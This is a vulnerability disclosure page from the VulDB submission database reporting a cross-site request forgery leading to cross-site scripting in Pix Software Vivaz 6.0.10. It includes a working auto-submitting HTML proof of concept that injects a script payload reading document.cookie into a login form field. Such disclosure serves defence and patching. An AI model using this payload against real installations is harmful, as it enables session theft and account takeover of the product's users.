Submeter #496141: Pix Software Vivaz 6.0.10 Cross-Site Request Forgeryinformação

TítuloPix Software Vivaz 6.0.10 Cross-Site Request Forgery
DescriçãoA vulnerability has been identified in Pix Software's Vivaz product, version 6.0.10, that allows for Cross-Site Scripting (XSS) execution via a Cross-Site Request Forgery (CSRF) attack. The application does not implement proper request validation mechanisms (such as CSRF tokens), allowing an attacker to send malicious requests on behalf of an authenticated user. Additionally, the lack of proper sanitization of input fields allows for the injection of malicious scripts, resulting in XSS. Impact: An attacker could exploit this vulnerability to execute arbitrary scripts in the context of the victim's browser. This could result in: Stealing cookies and session information, allowing user account takeover. Modification of content or unauthorized actions on behalf of the user. Escalation of privileges if the attack targets administrative accounts. PoC: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://x.x.x.x/servlet?act=login&pixrnd=0125012208303707364328" method="POST"> <input type="hidden" name="idIncPesqSatisfacao" value="1&quot;&gt;&lt;ScRiPt&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;ScRiPt&gt;" /> <input type="hidden" name="item" value="1" /> <input type="hidden" name="paramUsuario" value="1" /> <input type="hidden" name="senha" value="u&#93;H&#91;ww6KrA9F&#46;x&#45;F" /> <input type="hidden" name="sistema" value="1" /> <input type="hidden" name="subItem" value="1" /> <input type="hidden" name="usuario" value="1" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>
Fonte⚠️ https://www.pixsoft.com.br/
Utilizador
 Stux (UID 40142)
Submissão06/02/2025 18h35 (há 1 Ano)
Moderação15/02/2025 16h34 (9 days later)
EstadoAceite
Entrada VulDB295966 [Pix Software Vivaz 6.0.10 Falsificação de Pedido entre Sites]
Pontos17

VoltarVisão GeralPróximo

Do you know our Splunk app?

Download it now for free!